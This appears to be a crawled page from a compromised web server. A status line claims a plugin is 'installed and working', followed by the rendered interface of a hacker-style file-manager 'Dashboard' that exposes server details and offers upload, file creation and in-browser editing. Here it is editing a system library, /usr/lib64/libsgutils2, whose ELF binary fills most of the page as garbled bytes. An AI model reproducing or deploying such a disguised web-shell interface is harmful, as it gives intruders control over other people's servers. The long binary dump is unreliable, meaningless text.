{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-21 21:39:43"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Flib64">lib64</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Flib64" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: libsgutils2-1.47.so.2.0.0</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/lib64/libsgutils2-1.47.so.2.0.0">
                    <textarea name="edit_content">ELF          &gt;    �      @       �N         @ 8  @                                 (�      (�                    �       �       �      m�     m�                   �      �      �     (-     (-                  p�     p�     p�     0m      Xm                   ��     ��     ��     �      �                   �      �      �                                   �      �      �      $       $              S�td   �      �      �                             P�td   P�     P�     P�                        Q�td                                                  R�td   p�     p�     p�     �
      �
                      GNU   �                   GNU g��B�!�9gIw1��⑻,*      +           �A h&quot;&quot;�8/ (�)�@ ��4 � �P, @&lt;    # �0��` �� �0 �   0H�H�LP�A@ ��IB 	&quot;���dJ� �     ���� ;#�� 
H.�h�0 �� @x� �� (Z � ��&quot;@ �  0 Y
� Q�� :��$&quot;HB&quot;  ���  $$�����00A	!Q��� &quot;UJ5�|@�!B�   x�&quot;�+   ,   -   /   0       2   3   5       6   7   8   :   &lt;       =   @   A   B   C   E   G       H   I   K   L   N   O               P   Q   R   S       T                   V       X   Z   ]   _   `           a   b   c   d   e   g   i   j   k       m   n   p       q           r                   u       v   w   x   y   z       {       }      �   �   �       �   �   �       �   �   �       �   �       �   �       �   �   �   �       �   �               �   �       �       �   �   �       �   �       �       �   �   �   �   �   �   �   �   �   �       �           �   �       �       �   �   �   �       �           �               �   �       �           �   �   �   �           �       �   �   �   �   �   �           �       �   �   �       �       �               �   �   �           �   �   �                           �   �       �   �                                  	                                                                  !  &quot;      $  %  &amp;      &#039;  )  *  +  ,  .  /  ��5U��T��¤� �bɯ7&quot;�L�t�|��ӣ&#039;���wc1��e�b��m2�2yD��J�zr�z�F_P� ��$��G��SY4���K��ɋl��PS*�&#039;�H��Xo&amp;)�e#����o]�9�D� =�t��r˩{U3�=S��0#w+⃤x�i���S��ނ��M��{�Ş�{�z�k������B )̪����&#039;�]�L&lt;�� �}X==��0�G�ːư�ĒɂF�e�؍ݎv+���׭P
�Ҷ�)z�������Y���D��Ś��&quot;�_�KwG�-I�Z��C���{Td��hfpb�֓V�T���,ɭ���n:&lt;���o�0]|��&#039;���y_7acE�l8X�u�5��΁y�PF@�@C&#039;��B&quot;��;�4�&#039;����,DP�~�R3dinN3�{�XP��
TSvk�[T��j&amp;�r�w�q%���SÖ[���~������fv��.�fb��L�}��|�d�����&lt;��W;�D٢�%�䲀Œ�Ʊ�y�_[�L+ye�/�ޝ[?r�!�iϡPƬѢy����Zzd���F�,�������=x�w=QY�*�Qz����M��
�{
����x�E(�� v�;-SgG�SK}�ǵ~p�X4��ɳ�UH$TE��ih65�&amp;�+�L}M�˗�W��9���8-�k�&gt;c��Y�W�����v\�5�&lt;.�u������^ebW~�u��tBq�}����S�m�ߪ��t���chm�,0L�
����{��O2[��1�ϰ�,0L�£�����b�Im-dz��ߕ.G4��g��}�úaY�d���� �Ci�������o!��������a�4�`�&lt;H��)\Ǻ&#039;u����9.����&gt;#|#����u&gt;|�df����I���� w,�Qo&#039;]��S�y�c$�3Z\�U�(ѭ�����3L��j;m��І�쟏��;��&gt;�gg�9�ӜsL+vA�;��i���e�9�)_p���NX�{���E��� ֋��m����:                            �                     �                      M                     �                     s                      k                     �                                            �                     `                     |                     U                      �                      �                     v                     �                     �                     }                     �                     f                     L                     �                     �                                            D                                          �                     �                      �                     �                      �                     E                     �                     �                      �                     �                     ,                       f                     F   &quot;                                        R                     �                                      �    E     �      �    �                 �B                p            _    �     f       �    04     �      �    �B            o    P&amp;     ~      �    P�     :      �
    ��     �           ��            �	    �            �    �J     �      �    ��     *           `�     p       �          �      e    `�     �      �    ��     1       \     �     �      �    �D     7       C    �R                `o     &#039;          pu           �    ��     �       i    �+     &gt;       �    ��            �
     �            #    ��                �O     �      P    0     �       b    �l            �    �l            P    Љ                �.     	       8    �B            5    �&quot;     ;      Q    ��     �      �    ��     R      �    �     H      r    �            �    Pm     K       �    �     M       e    @�     2       �     P     �            �     #      �    �m     �      �    �     1       \     �     �       �    �(     �       (    �?            y    `            �    ��     N       U    p�     a      j    0     M       1    �R     7       �           D      �    е            �    0*     /       &lt;    ��     @      �    ��     �           �     �       �    01     �      �    ��            �    `�     U      �    �.     	       �    p)     �       O    �     �       9    �B            �     �     �      �    �     	       &gt;    P     (       �     �     	       �    �     7       �
    ��     �       H    @�            �
    @�     p           �w     �      *    05            �    ��     3       O    0�            �	     �     &amp;       }    �     &quot;       �	    С            �         �       
    `M     B      +    ��            �               �    PZ     �      p    �     E       
    �     r      �     �     �           �            O    &lt;     �      g    �     Q      �    ��     3           0            8    `%     L       �    P,     �      �    @^     �      �    �     �       �    ��            �    H     �      V    �     &gt;      �    p&quot;     �       5    `�     �       �    P�     3           �     P      Z    �            �    ��            a    �%     `       X    &amp;     �      �    �&#039;     �       ,    �            
    ��     `       �    p�            �    �     �          p     �       �    0�     k       �    *            �    �D     5       �    @�     7       �    �     	                       �    0�            �    0�            	    ��     9       �    `*     *      �     �            �    �.     	       �         �      �    �            �    ��     �       V	    ��                @�     0       ?    `}     
      #    �     	       �    0     �      2    @     �       �    `     �/      F    P�     E       7    �|     c      E
    `�     P       �    ��            p    �     �      /	     �     �      �
    `�     P       �    �            �    �     a           ��     &quot;       �    0�     f                 �       ?    ��            �    0�     m      |    `�     2      �    �                @$               ��     f      �     �     p       �     �     	       �    �     X       �    PD     8           �B            �	    0�     %       �    �           =    ��     m          �     �       3    ��     �      &quot;     7     B      {               ,    �z     �      b    P�            �    0�     N           �v     :      j    �
     &quot;      H    �%     6       �    Ъ     e      x	    ��            �    0�     	       �    0b     M      �    @�     �       8    P9     �      �    ��     �       �    �e     H      !    �B            �    `q           w    ��     C       n
     �     �           PX     &#039;           ��     �      .
     �     P       �    p�     �      t         b       �    �h     2      �    `#     �       K    @     Y      e    ��     �       �    ��     )       �     �     )      �    l     J      c    �            �	    `�     `       �                5     �            �    @�            �
    `�     �       )    P     �       �    �
     �       �    �            �    p     �      l    @U     �      V    �R     R      �     m     K       �    1                 ,     ?       �
    ��     �       �    `�            v     @     E       	    �6            �    0�     9      �    �     q       �    ж            H    ��     �       1          t       �    0     r      #    �{     	      @    ��     L       �    ��     #       �     �            �     �     �       
     �     �       K    �%     2       �     �           �    �&lt;     �       �          f       �    ��     #           @�     ?      N    @�     Q       �    �     /       �    P�     c       &#039;    ��             	    ��     8           �.     h      b     �B            �    ��            �     &lt;     p       �     �            !    `&quot;     /       H     =     �       3     �     %       [    ��     J       {    �     �          �     &quot;       �    �            s    �                ��           �    P.     �      Y
    ��     `       A	    ��     �      �     �     �      @    07     �      c    �?     F       d    �     )       �    �W     Z       __gmon_start__ _ITM_deregisterTMCloneTable _ITM_registerTMCloneTable __cxa_finalize strlen pr2ws sg_warnings_strm __vfprintf_chk __stack_chk_fail pr2serr sg_scnpr __vsnprintf_chk __fprintf_chk sg_get_initial_dsense getenv __isoc99_sscanf sg_set_warnings_strm sg_scsi_status_is_good sg_scsi_status_is_bad sg_get_scsi_status_str sg_lib_sstatus_str_arr sg_print_scsi_status sg_get_sense_key sg_get_sense_key_str sg_lib_sense_key_desc sg_get_asc_ascq_str sg_lib_asc_ascq_range sg_lib_asc_ascq sg_scsi_sense_desc_find sg_get_sense_info_fld sg_get_sense_cmd_spec_fld sg_get_sense_filemark_eom_ili sg_get_sense_progress_fld sg_get_pdt_str sg_lib_pdt_strs sg_lib_pdt_decay sg_lib_pdt_decay_arr sg_get_trans_proto_str sg_lib_transport_proto_strs sg_get_desig_code_set_str sg_get_desig_assoc_str sg_get_desig_type_str sg_get_zone_type_str sg_convert_errno sg_scsi_normalize_sense sg_err_category_sense sg_get_command_size sg_get_opcode_name sg_lib_normal_opcodes sg_get_opcode_sa_name sg_get_command_name sg_get_command_str sg_print_command_len sg_print_command sg_get_nvme_opcode_name sg_lib_nvme_nvm_cmd_arr __snprintf_chk sg_lib_nvme_admin_cmd_arr snprintf sg_vpd_dev_id_iter sg_get_sfs_str sg_lib_scsi_feature_sets sg_is_scsi_cdb sg_get_nvme_cmd_status_str sg_lib_nvme_cmd_status_arr strncpy sg_nvme_status2scsi sg_lib_scsi_status_sense_arr sg_nvme_desc2sense sg_build_sense_buffer safe_strerror sg_exit2str sg_exit_str_arr sg_if_can2stderr sg_if_can2stdout sg_get_category_sense_str dStrHex dStrHexErr dStrHexStr __memcpy_chk hex2stdout hex2stderr hex2str sg_decode_transportid_str sg_t10_uuid_desig2str sg_get_designation_descriptor_str sg_get_sense_descriptors_str sg_get_sense_str sg_is_big_endian sg_all_zeros sg_all_ffs dWordHex __printf_chk sg_get_num strspn strpbrk __ctype_toupper_loc strchr sg_get_num_nomult sg_get_llnum sg_get_llnum_nomult sg_f2hex_arr fopen64 fgets __ctype_b_loc stdin read __errno_location fclose fstat64 sg_ata_get_chars sg_get_page_size sysconf sg_memalign posix_memalign memset sg_print_sense free sg_is_aligned sg_get_big_endian sg_set_big_endian sg_lib_version sg_lib_version_str sg_set_text_mode sg_set_binary_mode sg_cmds_version sg_cmds_open_device sg_cmds_open_flags sg_cmds_close_device sg_cmds_process_resp sg_cmds_is_nvme sg_ll_request_sense sg_ll_request_sense_pt sg_ll_inquiry sg_ll_inquiry_v2 sg_ll_inquiry_pt sg_simple_inquiry sg_simple_inquiry_pt sg_ll_test_unit_ready_progress_pt sg_ll_test_unit_ready_progress sg_ll_test_unit_ready sg_ll_test_unit_ready_pt sg_ll_report_luns sg_ll_report_luns_pt sg_lib_zoning_out_arr sg_lib_zoning_in_arr sg_lib_write_buff_arr sg_lib_sanitize_sa_arr sg_lib_read_pos_arr sg_lib_read_attr_arr sg_lib_read_buff_arr sg_lib_rec_copy_sa_arr sg_lib_xcopy_sa_arr sg_lib_pr_out_arr sg_lib_pr_in_arr sg_lib_serv_bidi_arr sg_lib_serv_out16_arr sg_lib_serv_in16_arr sg_lib_serv_out12_arr sg_lib_serv_in12_arr sg_lib_maint_out_arr sg_lib_maint_in_arr sg_lib_variable_length_arr sg_mode_page_offset sg_msense_calc_length scsi_pt_version sg_pt_version sg_get_opcode_translation sntl_init_dev_stat sntl_resp_mode_sense10 memcpy sntl_resp_mode_select10 scsi_pt_close_device partial_clear_scsi_pt_obj sg_linux_get_sg_version get_pt_file_handle set_scsi_pt_cdb get_scsi_pt_cdb_len get_scsi_pt_cdb_buf set_scsi_pt_sense set_scsi_pt_data_in set_scsi_pt_data_out set_pt_metadata_xfer set_scsi_pt_packet_id set_scsi_pt_tag set_scsi_pt_task_management set_scsi_pt_task_attr set_scsi_pt_flags get_scsi_pt_resid get_pt_req_lengths get_pt_actual_lengths get_scsi_pt_status_response get_pt_result get_scsi_pt_sense_len get_scsi_pt_sense_buf get_scsi_pt_duration_ms sg_duration_set_nano get_pt_duration_ns get_scsi_pt_transport_err set_scsi_pt_transport_err get_scsi_pt_transport_err_str get_scsi_pt_result_category get_scsi_pt_os_err pt_device_is_nvme get_pt_nvme_nsid sg_get_nvme_char_devname strstr sg_find_bsg_nvme_char_major sg_lin_page_size sg_bsg_major destruct_scsi_pt_obj sg_print_host_status sg_print_driver_status sg_make_vpd_devid_for_nvme ioctl check_pt_file_handle sg_bsg_nvme_char_major_checked scsi_pt_open_flags __open64_2 scsi_pt_open_device set_pt_file_handle sg_checked_version_num sg_driver_version_num get_scsi_pt_os_err_str construct_scsi_pt_obj_with_fd calloc construct_scsi_pt_obj sg_print_masked_status sg_linux_sense_print sg_chk_n_print3 sg_chk_n_print sg_normalize_sense sg_err_category_new sg_err_category3 sg_err_category do_nvm_pt sg_do_nvme_pt do_scsi_pt sg_ll_sync_cache_10 sg_ll_readcap_16 sg_ll_readcap_10 sg_ll_mode_sense6 sg_ll_mode_sense10_v2 sg_ll_mode_sense10 sg_get_mode_page_controls sg_ll_mode_select6_v2 sg_ll_mode_select6 sg_ll_mode_select10_v2 sg_ll_mode_select10 sg_ll_log_sense_v2 sg_ll_log_sense sg_ll_log_select sg_ll_start_stop_unit sg_ll_start_stop_unit_pt sg_ll_prevent_allow sg_ll_get_lba_status16 sg_ll_get_lba_status sg_ll_get_lba_status32 sg_ll_report_tgt_prt_grp2 sg_ll_report_tgt_prt_grp sg_ll_set_tgt_prt_grp sg_ll_report_referrals sg_ll_send_diag_com sg_ll_send_diag_pt sg_ll_send_diag sg_ll_receive_diag_pt sg_ll_receive_diag sg_ll_receive_diag_v2 sg_ll_read_defect10 sg_ll_read_media_serial_num sg_ll_report_id_info sg_ll_set_id_info sg_ll_format_unit_v2 sg_ll_format_unit sg_ll_format_unit2 sg_ll_reassign_blocks sg_ll_persistent_reserve_in sg_ll_persistent_reserve_out sg_ll_read_long10 sg_ll_read_long16 sg_ll_write_long10 sg_ll_write_long16 sg_ll_verify10 sg_ll_verify16 sg_ll_ata_pt sg_ll_read_buffer sg_ll_write_buffer sg_ll_write_buffer_v2 sg_ll_unmap_v2 sg_ll_unmap sg_ll_read_block_limits sg_ll_receive_copy_results sg_ll_extended_copy sg_ll_3party_copy_out sg_ll_pre_fetch_x sg_ll_set_cd_speed sg_ll_get_config sg_ll_get_performance sg_ll_set_streaming libc.so.6 libsgutils2-1.47.so.2 GLIBC_2.33 GLIBC_2.7 GLIBC_2.14 GLIBC_2.4 GLIBC_2.3.4 GLIBC_2.2.5 GLIBC_2.3                                                                                                                                                                                                                                                                                                                           -         ���   M     ii   X     ���   b     ii   m     ti	   w     ui	   �     ii   �      p�            �     x�            p     ��            ��     ��            )�     ��            �     ��            1�     ��            �     ��            0     ��            ��     ��            ��     ��            ��     ��            �      �            �     �            �     �            -�     �            @�      �            \�     (�            �     0�            m�     8�            }�     @�            ��     H�            ��     P�            ��     X�            ��     `�            ��     h�            ��     p�                 x�            ��     ��            ��     ��            	�     ��            �     ��            �     ��            �     ��            +�     ��            :�     ��            I�     ��            X�     ��            g�     ��            v�     ��            }�     ��            ��     ��            ��     ��            ��     ��            ��      �            9�     �            @�     �            O�     �            \�      �            i�     (�            x�     0�            ��     8�            ��     @�            ��     H�            ��     P�            ��     X�            ��     `�            ͉     h�            ۉ     p�            �     x�            ��     ��            �     ��            )�     ��            ;�     ��            M�     ��            ^�     ��            u�     ��            �     ��            ��     ��            ��     ��            ��     ��            ��     ��            ��     ��            ϊ      �            ۊ      �            9�     (�            @�     0�            O�     8�            \�     @�            i�     H�            x�     P�            ��     X�            ��     `�            ��     h�            ��     p�            ��     x�            ��     ��            ͉     ��            ۉ     ��            �     ��            ��     ��            �     ��            X�     ��            ;�     ��            M�     ��            ^�     h�            9�     x�            D�     ��            P�     ��            Z�     ��            n�     ��            ��     ��            ��     ��            ��     ��            ��     �            ��     (�            `     8�            ��     H�            �     X�            �     h�            �     x�                 ��            ɭ     ��            @     ��            �     ��            �     ��            �     ��                 ��            (     �            ��     �            	�     (�            �     8�            )�     h�            ;�     x�            Q�     ��            n�     ��            x�     ��            ��     ��            ��     ��            ��     ��            ��     �            ɮ     (�            `     8�            ��     H�            �     X�            ޮ     h�            ��     x�            �     ��            �     ��            �     ��            8�     ��            X     ��            �     ��            P�     ��            d�     �            v�     �            ��     (�            ��     H�            ǯ     X�            ۯ     h�            �     x�            ��     ��            
�     ��            $�     ��            9�     ��            B�     ��            J�     ��            R�     �            R�     �            Z�     (�            �     8�            l�     H�            ~�     h�            ��     x�            ��     ��            ��     ��            ư     ��            װ     ��            �     ��            ��     ��            �     �            
�     �            �     (�             �     8�            Z�     H�            �     h�            4�     x�            K�     ��            ]�     ��            k�     ��            ~�     ��            ��     ��            ��     ��            ��     ��            ñ     ��            ߱     �            ��     �            �     H�            �     X�            -�     ��            E�     ��                 ��            @     ��            ^�     ��            y�     ��            `     ��            ��     �            �     �            ��     (�            �     8�            ��     H�            ز     X�            �     h�            ��     x�            �     ��            �     ��            �     ��            	     ��            8	     ��            `	     ��            �	     ��            �	     �            +�     �            �	     (�            C�     8�            �	     H�             
     X�            \�     h�            j�     x�            ��     ��            @
     ��            ��     ��            ��     ��            h
     ��            �
     ��            ͳ     ��            ݳ     ��            �     �            �
     �            �
     (�                 8�            �	     H�            8     h�            �     x�            �     ��             �     ��            +�     ��            7�     ��            L�     ��            X�     ��            h�     ��            }�     ��            ��     �            ��     �            ��     (�            ��     8�            ��     H�            ˴     X�            ܴ     h�            �     x�            �     ��            �     ��            &#039;�     ��            &lt;�     ��            M�     ��            Z�     ��            e�     ��            p�     ��            |�     �            ��     �            ��     (�            ��     8�            ��     H�            е     X�            �     h�            ��     x�            �     ��            )�     ��            A�     ��            W�     ��            e�     ��            z�     ��            ��     ��            ��     ��            X     �            ��     �            ʶ     (�            ٶ     8�            �     H�            �     X�            �     h�            �     x�            �     ��            ,�     ��            :�     ��            I�     ��            b�     ��            {�     ��            ��     ��            ��     ��            ·     �            ܷ     �            ��     (�            �     8�            �     H�            5�     X�            N�     h�            f�     x�            x�     ��            ��     ��            ��     ��            ¸     ��            �     ��            �     ��            x     ��            �     ��            �     �            I�     (�            W�     8�            m�     H�            ��     X�            ��     h�            ��     x�            h     ��            Ź     ��            Թ     ��            �     ��            �     ��            �     ��            �     ��            �     ��                  �            @     �            �     (�            7�     8�            S�     H�            h     X�            o�     h�            ��     x�            ��     ��            ��     ��            ��     ��            �     ��            Ѻ     ��            �     ��            �     ��            �     ��            �     �            �     �                 (�            ,�     8�            I�     H�            ]�     X�            w�     h�            ��     x�            ��     ��            ��     ��            û     ��            ֻ     ��            �     ��            �     ��            �     ��            8�     ��            8     �            I�     �            _�     (�            v�     8�            ��     H�            ��     X�            h     h�            ��     x�            �     ��            Ƽ     ��            �     ��            �     ��                 ��            8     ��            p     ��            ݼ     ��            �     �            �     �            �     (�             �     8�            �     H�            0�     X�            �     h�            G�     x�            _�     ��            �     ��            |�     ��                 ��            @     ��            ��     ��            h     ��            ��     ��            ӽ     �            �     �            �     (�            �     8�            ��     H�            �     X�            �     h�            �     x�                  ��            &lt;�     ��            L�     ��            (     �            Z�     �            i�     �            w�     ��            ��     �            ��     �            ��     (�            ľ     8�            ־     h�            �     x�            �     ��            ��     ��            ��     ��            �     ��            �     �            (�     �            ;�     �            P�     ��            c�     �            w�     (�            ��     8�            ��     H�            ÿ     X�            п     h�            �     x�            �     ��            �     ��            �     ��            $�     ��            1�     �            L�     �            a�     �            q�     ��            ��     �            ��     �            ��     (�            ��     8�            �     H�            �     X�            ��     h�            �     x�            �     ��            )�     ��            ;�     ��            F�     ��            T�     �            e�     �            n�     �            }�     �            ��     (�            ��     8�            ��     H�            ��     X�            ��     h�            �     x�            �     ��            �     ��            �     ��            �     ��            
�     �            �     �            �     �            ��     ��            &quot;�     �            *�     �            7�     (�            F�     8�            V�     H�            i�     X�            |�     h�            ��     x�            ��     ��            ��     ��            ��     ��            ��     ��            ��     �            ��     �            ��     �            ��     ��            ��     �            �     �            �     (�            $�     8�            $�     H�            0�     X�            ;�     h�            V�     x�            f�     ��            ��     ��            ��     ��            ��     ��            ��     �            ��     �            ��     �            ��     ��            ��     �            ��     �            �     (�            �     8�            �     H�            2�     X�            G�     h�            R�     x�            g�     ��            }�     ��            ��     ��            ��     ��            ��     �            ��     �            ��     �            ��     ��            P     �            ��     �            �     (�            �     8�            !�     H�            1�     X�            &gt;�     h�            N�     x�            [�     ��            i�     ��            x�     ��            ��     ��            ��     �            ��     �            ��     �            ��     ��            ��     �            ��     �            ��     (�            e�     8�            	�     H�            &#039;�     X�            4�     h�            ?�     x�            I�     ��            X�     ��            d�     ��            p�     ��            ��     �            ��     �            ��     �            ��     ��            ��     �            ��     �            ��     (�            ��     8�            	�     H�            �     X�            *�     h�            9�     x�            M�     ��            b�     ��            q�     ��            ��     ��            ��     �            ��     �            ��     �            ��     ��            ��                  ��                  �     (             �     8             0�     H             E�     X             W�     h             j�     x             s�     �             ��     �             ��     �             ��     �             ��     �             ��     �             ��     �             ��     �             ��                 ��                 �     (            �     8            )�     H            8�     X            B�     h            J�     x            Q�     �            b�     �            r�     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��                 ��                 	�     (            �     8            !�     H            1�     X            &lt;�     h            H�     x            W�     �            g�     �            z�     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��                 ��                 ��     (            �     8            #�     H            .�     X            C�     h            x     x            Y�     �            m�     �            |�     �            ��     �            �     �            ��     �            ��     �            ��     �            ��                 ��                 �     (            �     8            �     H            0�     X            =�     h            F�     x            P�     �            a�     �            o�     �            w�     �            ��     �            ��     �            ��                  ��                 �                 ��                  ��     0            ��     8            �     H            �     P                 `            �     h            ��     x            !�     �            @     �            h     �            .�     �            I�     �            ��     �            V�     �            �     �            f�     �            ��     �            q�                 �                  �     8            |�     @                 P            ��     X            ��     h            w�     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��     �            ��                  ��                 ��                 8     (            	�     0            p     @            �     X            *�     `            ?�     p            U�     x            e�     �            ��     �            �     �            �     �            �     �                              ��                 ��                 ��                  ��     0            ��     8            @     H            	�     P            h     `            �     x            6�     �            �     �            Q�     �            a�     �            p�     �            �     	            �      	                 8	            ��     P	            0     h	            `     �	            �     �	            �     �	                 �	            8     �	            `     �	            �     
            �     (
            �     @
                 X
            8     p
            p     �
            �     �
            ��     �
            �     �
            ��     �
            @     �
            h     �
            �     �
            �                  ��                 ��                 �                                   H     (            ��     0            ��     8            ��     @            ��     H            ��     P            ��     X            ��     `            :�     h            �     p            �     x            �     �            &#039;�     �            ?�     �            F�     �            N�     �            d�     �            s�     �            ��     �            ��     �            ��     �            ��     �            h     �            �     �            ��     �            ��     �            �     �            �                  7�                 P�                 U�                 Z�                  _�     (            d�     0            i�     8            n�     @            s�     H            x�     P            }�     X            ��     h            �     x            ��     �            �     �            ��     �            �     �            ��     �            ��     �                  �            H     �            ��                 p                 �     (            �     8            m�     H            �     X            -�     h            I�     x            f�     �            �     �            ��     �                  �            H     �            h     �            �     �            �     �            ��                 ��                 ��     (            ��     8            �     H            �     X            �     h                  x            P     �            �     �            �     �            �     �                  �            X     �            �     �            �     �            �                 (                 h     (            �     8            �     H                 X            P     h            �     x            �     �            �     �                  �            @      �            p      �            �      �            �      �             !     �            @!                 p!                 �!     (            �!     8             &quot;     H            X&quot;     X            �&quot;     h            �&quot;     x            �&quot;     �            ,�     �             #     �            H#     �            E�     �            x#     �            �#     �            �#     �            �#                 $                 a�     (            y�     8            ��     H            ��     X            ��     h            ��     x            P$     �            ��     �            ��     �            x$     �            ��     �            �$     �            �$     �            %     �            @%                 p%                 �     (            �%     8            �%     H            &amp;     X            @&amp;     h            x&amp;     x            �&amp;     �            �&amp;     �            &#039;     �            H&#039;     �            x&#039;     �            �&#039;     �            �&#039;     �            8�     �            (                 @(                 h(     (            �(     8            �(     H            D�     X            [�     h            y�     x            �(     �            )     �            ��     �            0)     �            `)     �            ��     �            ��     �            �)     �            �)                 �)                 *     (            ��     8            P*     H            x*     X            �*     h            �*     x            ��     �            �     �            1�     �            �*     �            K�     �            +     �            @+     �            p+     �            �+                 �+                 �     (            _�     8            v�     H            ��     X             ,     h            ��     x            ��     �            ��     �            ��     �            	�     �            �     �            0,     �            `,     �            )�     �            �,                 B�                 _�     (            �,     8            y�     H            �,     X            -     h            ��     x            P-     �            x-     �            ��     �            ��     �            ��     �            ��     �            �     �            �-     �            �-                 &#039;�                 @�     (            Y�     8             .     H            0.     X            P.     h            x.     x            �.     �            �.     �            �.     �            v�     �            (/     �            X/     �            �/     �            �/     �            �/                 0                 P0     (            �0     8            �0     H            �0     X            1     h            ��     x            ��     �            @1     �            h1     �            �1     �            ��     �            ��     �            ��     �            �1     �            �1                 �                 2     (            �     8            &quot;�     H            @�     X            (2     h            P2     x            x2     �            \�     �            �2     �            �2     �            �2     �            3     �            @3     �            p3     �            �3                 �3                 4     (            04     8            X4     H            �4     X            �4     h            �4     x            y�     �             5     �             5     �            ��     �            ��     �            H5     �            ��     �            ��     �            ��                 �                 /�     (            H�     8            p5     H            0     X            `     h            �     x            �5     �                 �            8     �            `     �            �     �            �     �            �     �                 �            c�                 x�                 �5     (             6     8            ��     H            ��     X            ��     h            ��     x            ��     �             �     �            �     �            X6     �            /�     �            G�     �            x6     �            �6     �            _�                 u�                 �6     (            ��     8            �6     H            ��     X            ��     h            (7     x            `7     �            �7     �            �7     �            �7     �            8     �            08     �            X8     �            �8     �            �8                 ��                 ��     (            �     8            �8     H            %�     X            &gt;�     h            W�     x            o�     �            �8     �            ��     �             9     �            X9     �            ��     �            �9     �            �9     �            ��                 ��                 �9     (            ��     8            :     H            8:     X            ��     h            �     x            $�     �            &lt;�     �            S�     �            j�     �            ��     �            X:     �            x:     �            ��     �            ��                  �:                  �:     (             ��     8              ;     H             8;     X             x;     h             �;     x             �;     �             �;     �              &lt;     �             H&lt;     �             p&lt;     �             �     �             ��     �             �&lt;     �             �&lt;     !            ��     !             =     (!            �     8!            *�     H!            ?�     X!             